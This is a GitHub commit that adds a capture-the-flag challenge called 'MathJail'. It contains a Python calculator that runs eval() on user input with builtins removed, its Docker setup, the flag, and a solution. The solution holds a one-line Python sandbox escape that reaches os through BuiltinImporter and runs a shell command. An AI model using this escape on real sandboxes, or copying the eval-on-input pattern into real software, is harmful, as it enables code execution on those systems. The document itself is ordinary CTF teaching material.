This repository has been archived by the owner on Jun 11, 2024. It is now read-only.
generated from BCACTF/chall-repo-template
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
* misc/mathjail * add solve path * told user how to exit * add command to end of solution (in case link breaks) * expose port in dockerfile --------- Co-authored-by: mudasir <96320211+mud-ali@users.noreply.github.com>
- Loading branch information
Showing
5 changed files
with
46 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,14 @@ | ||
| FROM python:3.12-bookworm | ||
|
|
||
| WORKDIR /app | ||
|
|
||
| RUN wget -O ynetd.c \ | ||
| https://raw.githubusercontent.com/johnsonjh/ynetd/e6fd08f8f5d0c6b8c18d645957e30ce012536ed4/ynetd.c \ | ||
| && echo "ec7509dec7737da54f8b18e1b5ba935d657f9f016c36cfc9ac08f9952373226f ynetd.c" | sha256sum -c \ | ||
| && gcc -o ynetd ynetd.c | ||
|
|
||
| COPY ./flag.txt . | ||
|
|
||
| COPY ./pycalculator.py . | ||
| EXPOSE 3000 | ||
| ENTRYPOINT ["./ynetd", "-p", "3000", "python3 ./pycalculator.py"] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,18 @@ | ||
| name: MathJail | ||
| categories: | ||
| - misc | ||
| value: 50 | ||
| flag: | ||
| file: ./flag.txt | ||
| description: |- | ||
| Just a fun python calculator! Good for math class. | ||
| hints: [] | ||
| files: | ||
| - src: ./pycalculator.py | ||
| deploy: | ||
| nc: | ||
| build: . | ||
| expose: 3000/tcp | ||
| authors: | ||
| - Zevi | ||
| visible: true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| bcactf{math_is_so_difficult_right?8943yfg09whgh3r89ghwerp} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,7 @@ | ||
| print("Welcome to your friendly python calculator!") | ||
| equation = input("Enter your equation below and I will give you the answer:\n") | ||
| while equation!="e": | ||
| answer = eval(equation, {"__builtins__":{}},{}) | ||
| print(f"Here is your answer: {answer}") | ||
| equation = input("Enter your next equation below (type 'e' to exit):\n") | ||
| print("Goodbye!") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,6 @@ | ||
| Look at this page: https://netsec.expert/posts/breaking-python3-eval-protections/ | ||
| Basically just make the command at the end to cat the flag file: | ||
|
|
||
| ```python | ||
| [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('os').system("cat flag.txt") | ||
| ``` |